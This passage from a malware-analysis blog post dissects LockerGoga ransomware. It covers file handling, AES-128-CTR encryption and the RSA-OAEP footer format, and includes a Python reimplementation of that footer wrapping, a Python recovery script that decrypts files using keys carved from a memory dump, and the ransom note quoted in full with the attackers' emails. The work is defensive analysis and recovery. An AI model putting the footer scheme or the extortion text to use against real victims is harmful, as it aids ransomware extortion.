The cryptolocker appends the ‘.locked’ extension. Files are encrypted with AES in CTR (streaming) mode with a 128-bit key. The per-file key and IV are encrypted with RSA-1024 using OAEP padding with the MGF1(SHA-1) mask generation function, and the encrypted key and IV are stored in the file footer.<br />
<div style="text-align: left;">
<span id="docs-internal-guid-68137098-7fff-92c0-c13a-66484c80deb0"><br /></span></div>
<div style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: left;">
<span id="docs-internal-guid-68137098-7fff-92c0-c13a-66484c80deb0"><span style="font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;"><img src="https://lh5.googleusercontent.com/vJTnKEkQSU1sUpCd5g_p-DenVpL8tZz97rXAliOsyWp9OtZ3SzlsICq2grGVlDjvI3a7NS7DYegiHcSEAPuF8brp95kfrMMsogQmfY-mq6ZlkS8NyBqEC8FiMo-8t9iKKQPV9doM" style="border: none; transform: rotate(0rad);" /></span></span></div>
<div style="text-align: left;">
<span id="docs-internal-guid-68137098-7fff-92c0-c13a-66484c80deb0"></span></div>
<div style="text-align: left;">
<span id="docs-internal-guid-68137098-7fff-92c0-c13a-66484c80deb0"><span style="font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;"><br /></span></span></div>
<div style="text-align: left;">
</div>
<h3 style="line-height: 1.38; margin-bottom: 4pt; margin-top: 16pt; text-align: left;">
<span style="color: #434343; font-family: "arial"; font-size: 14pt; font-weight: 400; vertical-align: baseline; white-space: pre;">File operations</span></h3>
<div style="text-align: left;">
<span style="font-weight: normal;"><br /></span></div>
The worker tries to open the file at the path passed to it by the master. It then requests write access to the target file through the Boost library.<br />
<br />
<div style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: left;">
<span style="color: black; font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre;"><img height="224" src="https://lh6.googleusercontent.com/W8aeN7hX_FPK84bLKWDuolikZhblv1gfbVQmVobOuwb-Rc9bB8zBNke3c7HXjJnYH-f344QjoIbqY3BEarYvYsiCN3KUiT-vKLhwUEZGOcWIGhyuCVORo0fXx3VX1tLjG17CgEFc" style="border: none; transform: rotate(0rad);" width="624" /></span></div>
<div style="text-align: left;">
<span style="font-weight: normal;"><br /></span></div>
<br />
If a ‘.locked’ version of the file already exists, the worker deletes it before encryption starts.<br />
<br />
<div style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: left;">
<span style="color: black; font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre;"><img src="https://lh5.googleusercontent.com/HWWs-GkT-b-vi9EUR4P71eYzkfDPrEMeh0oxDSBIBSb2dr1hinj2neM9IncBxpbSNr3D8IoJAdItupTZH8eHLYK16gJxsrptXnxMciFhNjdyCmwCPqvIC7jRpw1VtB9vwIWZiPb1" style="border: none; transform: rotate(0rad);" /></span></div>
<div style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: left;">
<span style="color: black; font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre;"><br /></span></div>
<div style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: left;">
<span style="color: black; font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre;"><img height="357" src="https://lh4.googleusercontent.com/GnFaz1Oui4RgNidz4kHNsZzHgGq76CumDyVHjQ92Y9MYOdW26zdfidLXssUhL2NxRLsgbRCRlm9NBpOqM0tOX0roy0xaHBoZS4iFajw9NZDfalxODdP-k_cGvCtdH5JN8nNfZT3x" style="border: none; transform: rotate(0rad);" width="574" /></span></div>
<div style="text-align: left;">
<span style="font-weight: normal;"><br /></span></div>
After that, the worker renames the file to add the ‘.locked’ extension and encrypts its content in 65,536-byte blocks.<br />
<br />
<div style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: left;">
<span style="color: black; font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre;"><img height="480" src="https://lh6.googleusercontent.com/yMNZaUGlwtIugsiIXORzc45MbrjfB3xymqbxOorn2GG2q6B3-t6wDLCDI1Kr0Qb5W6zl-aTtfPkdRuX6Q4R5a0ua0xP5Ub7Fel_TP3IZZq6MJXj2NmEXrYZX7f_xfB6Ik3RnXjws" style="border: none; transform: rotate(0rad);" width="608" /></span></div>
<div style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: left;">
<span style="color: black; font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre;"><br /></span></div>
<div style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: left;">
<span style="color: black; font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre;"><span id="docs-internal-guid-1ece72fa-7fff-3360-4457-79d356937239"></span></span></div>
<h3 style="line-height: 1.38; margin-bottom: 4pt; margin-top: 16pt;">
<span style="color: #434343; font-family: "arial"; font-size: 14pt; font-weight: 400; vertical-align: baseline; white-space: pre;">File encryption</span></h3>
<div>
<span style="color: #434343; font-family: "arial"; font-size: 14pt; font-weight: 400; vertical-align: baseline; white-space: pre;"><br /></span></div>
For file content encryption, LockerGoga uses AES in CTR (counter) stream mode with a 128-bit key.<br />
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">The file key and IV are generated with the Windows CryptGenRandom function.</span></div>
<span id="docs-internal-guid-84147652-7fff-70f1-9223-db91c8bb19a0"></span><br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><img height="209" src="https://lh5.googleusercontent.com/TNNfydTkgjix1x7J-exkayX-v5we60eXH-s-BHjv3RFV06JzN9LYUHMo3haI9G6mvT1m91_5p-qLi96_ifqbjtM7kqzL6pTydvttxP7YhIWsN4ojVKSisr1DU7eqCBulTQEE4UB1" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="529" /></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial";"><span style="font-size: 14.6667px; white-space: pre-wrap;">Crypto++ enables AES-NI acceleration:</span></span></div>
<br />
<div style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: left;">
<span style="color: black; font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre;"><img height="336" src="https://lh6.googleusercontent.com/3cQghkQ_mzJHLAXogWG4AVmEiw2qpopnchCmVGHBQ_aiW177ZdRJ_FH4dSNi3D8YRPDluV4dAGWSOps9JCo5PYPU6BZWrZ9fxyCccyhJa2YQbWSzAF9Wpze5IaGwt1jXPUc47Jkk" style="border: none; transform: rotate(0rad);" width="438" /></span></div>
<div style="text-align: left;">
<span style="font-weight: normal;"><br /></span></div>
<div style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: left;">
<span style="color: black; font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre;"><img src="https://lh4.googleusercontent.com/UPxGrKz7388xQgPyOXpXz24Psb4Skcfp7mbA-S7kvn6fKhMetc2REf9e_G_mzi2_b-U-8iaqu4ABWEPh_G55QOpQWvzR1E2WhgYtw3kqaS5Dc0UmYJcQ1G4JJ1Y78vt13wYvNJDw" style="border: none; transform: rotate(0rad);" /></span></div>
<div style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: left;">
<span style="color: black; font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre;">...</span></div>
<div style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: left;">
<span style="color: black; font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre;"><img src="https://lh3.googleusercontent.com/600xjYRZ1Egrx3-78_VHif9IXu6qcSXe7iL2PeFPElF8wWOx9uv5rHB97Ek-OeczT8A9KTuxe4SomC-MM3o61uTNCrKuEs1T903int6CJhrrEwji0-dfdiAeV4_40o1kx8Rb8538" style="border: none; transform: rotate(0rad);" /></span></div>
<div style="text-align: left;">
<span style="font-weight: normal;"><br /></span></div>
<h3 style="line-height: 1.38; margin-bottom: 4pt; margin-top: 16pt; text-align: left;">
<span style="color: #434343; font-family: "arial"; font-size: 14pt; font-weight: 400; vertical-align: baseline; white-space: pre;">Footer encryption</span></h3>
<div style="text-align: left;">
<span style="font-family: "arial"; font-size: 11pt; white-space: pre;"><br /></span></div>
During the initialization phase, the worker instantiates an RSAFunction object and loads the hardcoded public key (modulus and public exponent) from PEM format.<br />
<br />
<img src="https://lh6.googleusercontent.com/fzX_pA0S6fbvVMpy_H3H7BnlHMbzMSyNV5p406ayDg3-BK-1aZSts-v6JEgF3hGpwECvNvv9plrLKgCWKHrYJM0VMnPexYwfiDepm1poakFKVR6IImc3VfzsDvQnkmb839kDWYlT" style="border: none; font-family: arial; font-size: 11pt; transform: rotate(0rad); white-space: pre;" /><br />
<div style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: left;">
<span style="color: black; font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre;"><img src="https://lh6.googleusercontent.com/KB1cN3BkYDrAQ58JIokQRCBOzkf7Z4hjSBkV0VT_SlTLr0L7ZBDGul5aHMNyD0k2g7sDP1PswgtxGbFY3RK7FM2tBuiUzdD27Qcg2gB5Tr1_SH00Kp-j1iS8mHVFFJ668SQi7WWw" style="border: none; transform: rotate(0rad);" /></span></div>
<div style="text-align: left;">
<span style="font-weight: normal;"><br /></span></div>
<div style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: left;">
<span style="color: black; font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre;"><img height="245" src="https://lh5.googleusercontent.com/otCa7VJgK95OXe2oZCIdOJ-Nifzsm5WT_8s7gkyzi-d53ZghjVRr82MpklWHqoB0WxZa_tN2vtuAMRnNuatPHuh7lMQBgKGKjO_-N8LwxpKWtGL1Ff7_-UZaoDHYjlqoHJffUFFa" style="border: none; transform: rotate(0rad);" width="624" /></span></div>
<div style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: left;">
<span style="color: black; font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre;"><br /></span></div>
<div style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: left;">
<span style="color: black; font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre;"><img height="318" src="https://lh4.googleusercontent.com/L5W3kGwOGRNd_nMBCzadF-Sa0lnz8BZ_zHbbVoLLJB8fNxyrlwnwK0VhppHOtBFPSgBXs4W6JMpAxsrNJ0CBnHZXdkZynmN7aiDcZhkVsD6GFGMtqWIFcBTbzjNQlBwX0kykNaR-" style="border: none; transform: rotate(0rad);" width="493" /></span></div>
<div style="text-align: left;">
<span style="font-weight: normal;"><br /></span></div>
The cryptolocker uses RSA-1024 with OAEP padding and the ‘MGF1(SHA-1)’ mask generation function to encrypt a 40-byte buffer consisting of four leading zero bytes, the 16-byte file IV, the 16-byte file key, and the terminating 4-byte string “goga”.<br />
<br />
<div style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: left;">
<span style="color: black; font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre;"><img height="346" src="https://lh4.googleusercontent.com/epB63SqVp1EBHjH7CLgMKDONfmfuzH1TudZSCabD-fJPgonuAvplR0tMH3EzuCKOVg3c_NtON5zID0i53eyHKTn0Y-wFLqteg0Uo-LcXe1m-Kr9h_NBzcpnIz-yoEOjjlX4SWzyC" style="border: none; transform: rotate(0rad);" width="561" /></span></div>
<div style="text-align: left;">
<span style="font-weight: normal;"><br /></span></div>
Once encrypted, the footer is appended to the end of the encrypted file.<br />
<div style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: left;">
<span style="color: black; font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre;"><br /></span></div>
<div style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: left;">
<span style="color: black; font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre;"><img height="563" src="https://lh3.googleusercontent.com/F0o1xrTd28PThKVTblYPPHgMrnnch6hFD3cMEoDT5NHVrdpAn06DveWN7t0rl0N4znY1jwu4LukZG4G8oUSpcT4hhXalY6IZ8qcKaxA7XfA3T_kPMe5bKx84Edp_C2YzWdKWVn_F" style="border: none; transform: rotate(0rad);" width="547" /></span></div>
<div style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: left;">
<span style="color: black; font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre;"><br /></span></div>
The low public exponent (e=17) is mitigated by the randomized OAEP padding: encrypting the same 40-byte plaintext under the same public key yields a different footer ciphertext every time, which is also how the padding scheme can be recognised when comparing footers of files encrypted with the same key and IV.<br />
<div style="text-align: left;">
<span style="font-weight: normal;"><br /></span></div>
<div style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: left;">
<span style="color: black; font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre;"><img height="396" src="https://lh4.googleusercontent.com/Imb4m2dFh4ZIQJ06ZkxyOqv-Z1kGwpONi0g7zz-C6R6I7ubwl2SuEz34R4Rrco3V__rqYY-UXx3-_O-JFzp6DkvarRpxEHv5TLw69iKErL6wtVFuEzCj8oF2x__-tgOAaZ14LTo8" style="border: none; transform: rotate(0rad);" width="624" /></span></div>
<div style="text-align: left;">
<span style="font-weight: normal;"><br /></span></div>
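The footer construction described above, as an added example that is not the malware's code and does not use Crypto++: a pure-Python RSA-OAEP (MGF1 with SHA-1, empty label) over the 40-byte buffer, with a throwaway RSA-1024 key pair generated on the fly using the sample's public exponent e=17. The key generation, the OAEP decoder (which is not constant-time and is meant for offline analysis only) and the function names are this example's own; the 4-zero-bytes | IV | key | "goga" layout and the 128-byte ciphertext size are taken from the analysis.

```python
import hashlib
import os
import secrets

HLEN = 20  # SHA-1 digest size: LockerGoga's OAEP uses MGF1(SHA-1)

def mgf1_sha1(seed, length):
    """MGF1 (PKCS#1 v2.2, B.2.1) instantiated with SHA-1."""
    out = b""
    for counter in range((length + HLEN - 1) // HLEN):
        out += hashlib.sha1(seed + counter.to_bytes(4, "big")).digest()
    return out[:length]

def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))

def oaep_encode(msg, k, seed=None):
    """EME-OAEP encoding with an empty label. 'seed' is fresh randomness; it is
    what makes two encryptions of the same footer buffer differ."""
    if len(msg) > k - 2 * HLEN - 2:
        raise ValueError("message too long for this modulus")
    lhash = hashlib.sha1(b"").digest()
    db = lhash + b"\x00" * (k - len(msg) - 2 * HLEN - 2) + b"\x01" + msg
    seed = os.urandom(HLEN) if seed is None else seed
    masked_db = xor(db, mgf1_sha1(seed, k - HLEN - 1))
    masked_seed = xor(seed, mgf1_sha1(masked_db, HLEN))
    return b"\x00" + masked_seed + masked_db

def oaep_decode(em, k):
    """EME-OAEP decoding. Not constant-time: fine for offline analysis, not for a service."""
    masked_seed, masked_db = em[1:1 + HLEN], em[1 + HLEN:]
    seed = xor(masked_seed, mgf1_sha1(masked_db, HLEN))
    db = xor(masked_db, mgf1_sha1(seed, k - HLEN - 1))
    idx = db.find(b"\x01", HLEN)  # the 0x01 that terminates the zero padding
    if em[0] != 0 or db[:HLEN] != hashlib.sha1(b"").digest() or idx < 0 or any(db[HLEN:idx]):
        raise ValueError("decryption error")
    return db[idx + 1:]

def is_probable_prime(n, rounds=16):
    """Miller-Rabin; sufficient for a throwaway demo key (assumption: demo only)."""
    if n < 2 or any(n % p == 0 for p in (2, 3, 5, 7, 11, 13)):
        return n in (2, 3, 5, 7, 11, 13)
    d, r = n - 1, 0
    while d % 2 == 0:
        d, r = d // 2, r + 1
    for _ in range(rounds):
        x = pow(secrets.randbelow(n - 3) + 2, d, n)
        if x in (1, n - 1):
            continue
        for _ in range(r - 1):
            x = pow(x, 2, n)
            if x == n - 1:
                break
        else:
            return False
    return True

def gen_rsa_keypair(bits=1024, e=17):
    """Demo RSA key pair with the sample's small public exponent e=17. e is prime, so
    gcd(e, phi) == 1 as long as neither p-1 nor q-1 is divisible by e."""
    def prime(nbits):
        while True:
            cand = secrets.randbits(nbits) | (3 << (nbits - 2)) | 1  # top two bits set: n is exactly 'bits' long
            if (cand - 1) % e and is_probable_prime(cand):
                return cand
    p, q = prime(bits // 2), prime(bits // 2)
    return p * q, e, pow(e, -1, (p - 1) * (q - 1))

def footer_plaintext(file_key, file_iv):
    """The 40-byte buffer the worker wraps with RSA-OAEP: 4 zero bytes | IV | key | 'goga'."""
    return b"\x00" * 4 + file_iv + file_key + b"goga"

def encrypt_footer(n, e, file_key, file_iv):
    """Worker side: returns the k-byte (128 for RSA-1024) footer ciphertext."""
    k = (n.bit_length() + 7) // 8
    em = oaep_encode(footer_plaintext(file_key, file_iv), k)
    return pow(int.from_bytes(em, "big"), e, n).to_bytes(k, "big")

def decrypt_footer(n, d, ciphertext):
    """Master side (needs the private key): returns (file_key, file_iv) or raises."""
    k = (n.bit_length() + 7) // 8
    buf = oaep_decode(pow(int.from_bytes(ciphertext, "big"), d, n).to_bytes(k, "big"), k)
    if len(buf) != 40 or buf[:4] != b"\x00" * 4 or buf[36:] != b"goga":
        raise ValueError("not a LockerGoga footer buffer")
    return buf[20:36], buf[4:20]

if __name__ == "__main__":
    n, e, d = gen_rsa_keypair()
    key, iv = os.urandom(16), os.urandom(16)
    c1, c2 = encrypt_footer(n, e, key, iv), encrypt_footer(n, e, key, iv)
    print("same plaintext, different ciphertext:", c1 != c2)
    print("recovered key/IV match:", decrypt_footer(n, d, c1) == (key, iv))
```

Running the script twice over the same key and IV gives two different 128-byte ciphertexts that both decode to the same buffer, which is the behaviour the analysis relies on to identify OAEP; with textbook RSA and e=17 the two ciphertexts would be identical and a 40-byte message would be recoverable by taking a 17th root.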
<h3 style="line-height: 1.38; margin-bottom: 4pt; margin-top: 16pt;">
<span style="color: #434343; font-family: "arial"; font-size: 14pt; font-weight: 400; vertical-align: baseline; white-space: pre;">Ransom note</span></h3>
<br />
Once files are encrypted, the locker drops the ransom note as 'README_LOCKED.txt'. Note that the algorithms it advertises (RSA-4096 and AES-256) do not match the RSA-1024 and AES-128 actually used:<br />
<blockquote class="tr_bq">
<span style="color: blue;"><i>Greetings!</i></span><br />
<span style="color: blue;"><i><br /></i></span>
<span style="color: blue;"><i>There was a significant flaw in the security system of your company.</i></span><br />
<span style="color: blue;"><i>You should be thankful that the flaw was exploited by serious people and not some rookies.</i></span><br />
<span style="color: blue;"><i>They would have damaged all of your data by mistake or for fun.</i></span><br />
<span style="color: blue;"><i><br /></i></span>
<span style="color: blue;"><i>Your files are encrypted with the strongest military algorithms RSA4096 and AES-256.</i></span><br />
<span style="color: blue;"><i>Without our special decoder it is impossible to restore the data. </i></span><br />
<span style="color: blue;"><i>Attempts to restore your data with third party software as Photorec, RannohDecryptor etc.</i></span><br />
<span style="color: blue;"><i>will lead to irreversible destruction of your data.</i></span><br />
<span style="color: blue;"><i><br /></i></span>
<span style="color: blue;"><i>To confirm our honest intentions.</i></span><br />
<span style="color: blue;"><i>Send us 2-3 different random files and you will get them decrypted.</i></span><br />
<span style="color: blue;"><i>It can be from different computers on your network to be sure that our decoder decrypts everything.</i></span><br />
<span style="color: blue;"><i>Sample files we unlock for free (files should not be related to any kind of backups).</i></span><br />
<span style="color: blue;"><i><br /></i></span>
<span style="color: blue;"><i>We exclusively have decryption software for your situation</i></span><br />
<span style="color: blue;"><i><br /></i></span>
<span style="color: blue;"><i>DO NOT RESET OR SHUTDOWN - files may be damaged.</i></span><br />
<span style="color: blue;"><i>DO NOT RENAME the encrypted files.</i></span><br />
<span style="color: blue;"><i>DO NOT MOVE the encrypted files.</i></span><br />
<span style="color: blue;"><i>This may lead to the impossibility of recovery of the certain files.</i></span><br />
<span style="color: blue;"><i><br /></i></span>
<span style="color: blue;"><i>The payment has to be made in Bitcoins.</i></span><br />
<span style="color: blue;"><i>The final price depends on how fast you contact us.</i></span><br />
<span style="color: blue;"><i>As soon as we receive the payment you will get the decryption tool and</i></span><br />
<span style="color: blue;"><i>instructions on how to improve your systems security</i></span><br />
<span style="color: blue;"><i><br /></i></span>
<span style="color: blue;"><i>To get information on the price of the decoder contact us at:</i></span><br />
<span style="color: blue;"><i>SuzuMcpherson@protonmail.com</i></span><br />
<span style="color: blue;"><i>AsuxidOruraep1999@o2.pl</i></span><br />
<div>
<br /></div>
</blockquote>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<span style="font-family: "arial"; font-size: 16pt; white-space: pre;">Decryption</span></div>
<br />
In the general case, it is not possible to decrypt the affected files without the master private key. However, if a memory dump was taken while the worker was encrypting a file, that particular file can be decrypted: the file path and the corresponding AES key and IV can be located in the dump by searching for the ‘GOGA<VERSION_ID>’ and ‘goga’ strings.<br />
<br />
<div style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: left;">
<span style="color: black; font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre;"><img height="228" src="https://lh5.googleusercontent.com/7SpW4neDetMimsmpkqXTcF7mRZhwm6R-Mx6qf3oALMZicbbpbOXPjPhixE9Cf6pcFntFgRIcgFsD_CS4YbYz8MBkvMzbHB1k7JfE5yMYrxdFl6EvfMJPZiQJlZ5cVQ8WZdvlMCIX" style="border: none; transform: rotate(0rad);" width="542" /></span></div>
<div style="text-align: left;">
<span style="font-weight: normal;"><br /></span></div>
<div style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: left;">
To decrypt an encrypted file for which you have located the key and IV in the memory dump:<br />
<ol style="text-align: left;">
<li>Make a backup copy of the encrypted file.</li>
<li>Remove the footer (the last 148 bytes) from the encrypted file.</li>
<li>Decrypt the remaining content with any tool that implements AES-128-CTR. For example, to decrypt the file encrypted with the key and IV shown in the picture above, run:</li>
</ol>
<blockquote class="tr_bq" style="text-align: left;">
<i>$ openssl aes-128-ctr -d -in chs_boot.ttf.locked_nofooter -K F12D893D2B9E8CC639C2EE3B06617AAC -iv 44C5A7A5FBF58C0C91D16E075B130070 -out chs_boot.ttf</i></blockquote>
<br />
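The same procedure as a script, added here as an example that is not part of the original analysis and not the malware's code: it carves the file key and IV out of a memory dump by looking for the 40-byte buffer described in the footer section (assumption: the buffer is still intact in the dump in that layout), strips the 148-byte footer and undoes AES-128-CTR with a dependency-free AES so that it runs on a bare Python install. The counter is assumed to be the IV incremented as a 128-bit big-endian integer, which is what both Crypto++ and the openssl command above do; the function names are this example's own.

```python
"""Recover a LockerGoga-encrypted file from a file key/IV carved out of a memory dump."""

FOOTER_LEN = 148   # RSA-1024 ciphertext plus marker appended to every .locked file
MARKER = b"goga"   # trailer of the 40-byte key/IV buffer

def gf_mul(a, b):
    """Multiply in GF(2^8) modulo x^8 + x^4 + x^3 + x + 1."""
    r = 0
    while b:
        if b & 1:
            r ^= a
        a <<= 1
        if a & 0x100:
            a ^= 0x11B
        b >>= 1
    return r

def _sbox_entry(x):
    inv = 1
    for _ in range(254):   # x^254 == x^-1 in GF(2^8); 0 maps to 0
        inv = gf_mul(inv, x)
    rotl = lambda v, s: ((v << s) | (v >> (8 - s))) & 0xFF
    return inv ^ rotl(inv, 1) ^ rotl(inv, 2) ^ rotl(inv, 3) ^ rotl(inv, 4) ^ 0x63

SBOX = [_sbox_entry(x) for x in range(256)]

def expand_key(key):
    """AES-128 key schedule: 11 round keys of 16 bytes, column-major like the state."""
    w = [list(key[i:i + 4]) for i in range(0, 16, 4)]
    rcon = 1
    for i in range(4, 44):
        t = list(w[i - 1])
        if i % 4 == 0:
            t = [SBOX[b] for b in t[1:] + t[:1]]   # SubWord(RotWord(t))
            t[0] ^= rcon
            rcon = gf_mul(rcon, 2)
        w.append([w[i - 4][j] ^ t[j] for j in range(4)])
    return [sum(w[4 * r:4 * r + 4], []) for r in range(11)]

def aes_encrypt_block(round_keys, block):
    """One AES-128 block encryption; CTR mode needs only the forward direction."""
    s = [b ^ k for b, k in zip(block, round_keys[0])]
    for rnd in range(1, 11):
        s = [SBOX[b] for b in s]
        s = [s[((c + r) % 4) * 4 + r] for c in range(4) for r in range(4)]   # ShiftRows
        if rnd != 10:                                                         # MixColumns
            m = []
            for c in range(4):
                a0, a1, a2, a3 = s[4 * c:4 * c + 4]
                m += [gf_mul(a0, 2) ^ gf_mul(a1, 3) ^ a2 ^ a3,
                      a0 ^ gf_mul(a1, 2) ^ gf_mul(a2, 3) ^ a3,
                      a0 ^ a1 ^ gf_mul(a2, 2) ^ gf_mul(a3, 3),
                      gf_mul(a0, 3) ^ a1 ^ a2 ^ gf_mul(a3, 2)]
            s = m
        s = [b ^ k for b, k in zip(s, round_keys[rnd])]
    return bytes(s)

def aes128_ctr(key, iv, data):
    """CTR: the IV is the first counter block and is incremented as a 128-bit
    big-endian integer (Crypto++/OpenSSL semantics). Encrypts and decrypts alike."""
    rk = expand_key(key)
    ctr = int.from_bytes(iv, "big")
    out = bytearray()
    for off in range(0, len(data), 16):
        block = ((ctr + off // 16) % (1 << 128)).to_bytes(16, "big")
        ks = aes_encrypt_block(rk, block)
        out += bytes(x ^ y for x, y in zip(data[off:off + 16], ks))
    return bytes(out)

def carve_key_iv(dump):
    """Yield (file_key, file_iv) for every 40-byte buffer (4 zero bytes | IV | key | 'goga')
    found in a memory dump; assumption: the buffer survives intact in that layout."""
    pos = dump.find(MARKER)
    while pos != -1:
        start = pos - 36
        if start >= 0 and dump[start:start + 4] == b"\x00" * 4:
            yield dump[start + 20:start + 36], dump[start + 4:start + 20]
        pos = dump.find(MARKER, pos + 1)

def decrypt_locked_file(locked, key, iv):
    """Strip the 148-byte footer and undo AES-128-CTR with the carved file key/IV."""
    if len(locked) < FOOTER_LEN:
        raise ValueError("file shorter than a LockerGoga footer")
    return aes128_ctr(key, iv, locked[:-FOOTER_LEN])

if __name__ == "__main__":
    import sys   # usage: lockergoga_decrypt.py <file.locked> <key_hex> <iv_hex> <out_file>
    locked_path, key_hex, iv_hex, out_path = sys.argv[1:5]
    with open(locked_path, "rb") as f:
        data = f.read()
    with open(out_path, "wb") as f:
        f.write(decrypt_locked_file(data, bytes.fromhex(key_hex), bytes.fromhex(iv_hex)))
```

Because CTR mode turns AES into a keystream generator, a wrong key or IV does not fail loudly: the output is simply garbage, so check the recovered file against its expected magic bytes before trusting a carved key. The AES core is validated against the FIPS-197 and SP 800-38A test vectors, which is the check to run before pointing it at a real dump.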
<span style="font-family: "arial"; font-size: 16pt; white-space: pre;">Conclusion</span></div>
<div style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: left;">
<br />
LockerGoga breaks the patterns of ransomware development. First, it showed that malware does not need obfuscation, packing, or runtime encryption to attack an organization successfully; a digital certificate is a far more effective weapon in this regard. On the contrary, employing the conventional self-defense techniques may have the opposite effect: high entropy, for example, can attract unnecessary attention from antivirus heuristics.<br />
<br />
Second, although hardcoded crypto functions and libraries have been used by TeslaCrypt, MoneroPay, GlobeImposter and Locky for years, static linking of the Crypto++ and Boost libraries, for which disassemblers have no signatures, complicates reverse engineering and obscures the execution flow. We discussed the problem of finding embedded crypto primitives in ransomware last year at <a href="https://www.virusbulletin.com/conference/vb2018/abstracts/artificial-intelligence-assist-ransomware-cryptanalysis">VB2018</a>.<br />
<br />
Third, LockerGoga cares about performance. Multithreading in ransomware was first seen in <a href="https://www.nioguard.com/2015/09/teslacrypt-21-analysis-cracking-ping.html">TeslaCrypt 2.0</a>, where separate threads were responsible for killing the processes of analysis tools, searching for and encrypting files, and C&C communication. Here, the cryptolocker leverages multiprocessing and task distribution instead. The Crypto++ AES implementation also enables AES-NI to speed up encryption. Moreover, the low public exponent (e=17 instead of the standard e=65537) improves RSA performance and, balanced by the randomized OAEP padding, does not significantly increase the security risk (read more about attacks on RSA in <a href="https://crypto.stanford.edu/~dabo/pubs/papers/RSA-survey.pdf">https://crypto.stanford.edu/~dabo/pubs/papers/RSA-survey.pdf</a> by Dan Boneh).<br />
<br />
UPDATE:<br />
<br />
Reversing LockerGoga video tutorial on YouTube:<br />
<br />
<ul style="text-align: left;">
<li><a href="https://www.youtube.com/watch?v=KhMdZZD_-Ec">Part 1. Debugging a process chain.</a></li>
<li><a href="https://www.youtube.com/watch?v=76CSdCCCunU">Part 2. Finding encryption algorithms.</a></li>
<li><a href="https://www.youtube.com/watch?v=tmd2azAsNuo">Part 3. File encryption and decryption.</a></li>
</ul>
<br />
<span style="font-family: "arial"; font-size: 16pt; white-space: pre;">See also</span></div>
<ol style="text-align: left;">
<li><a href="https://motherboard.vice.com/amp/en_us/article/8xyj7g/ransomware-forces-two-chemical-companies-to-order-hundreds-of-new-computers">https://motherboard.vice.com/amp/en_us/article/8xyj7g/ransomware-forces-two-chemical-companies-to-order-hundreds-of-new-computers</a> </li>
<li><a href="https://www.forcepoint.com/blog/security-labs/lockergoga-ransomware-how-it-works">https://www.forcepoint.com/blog/security-labs/lockergoga-ransomware-how-it-works</a> </li>
<li><a href="https://www.bleepingcomputer.com/news/security/new-lockergoga-ransomware-allegedly-used-in-altran-attack/">https://www.bleepingcomputer.com/news/security/new-lockergoga-ransomware-allegedly-used-in-altran-attack/</a> </li>
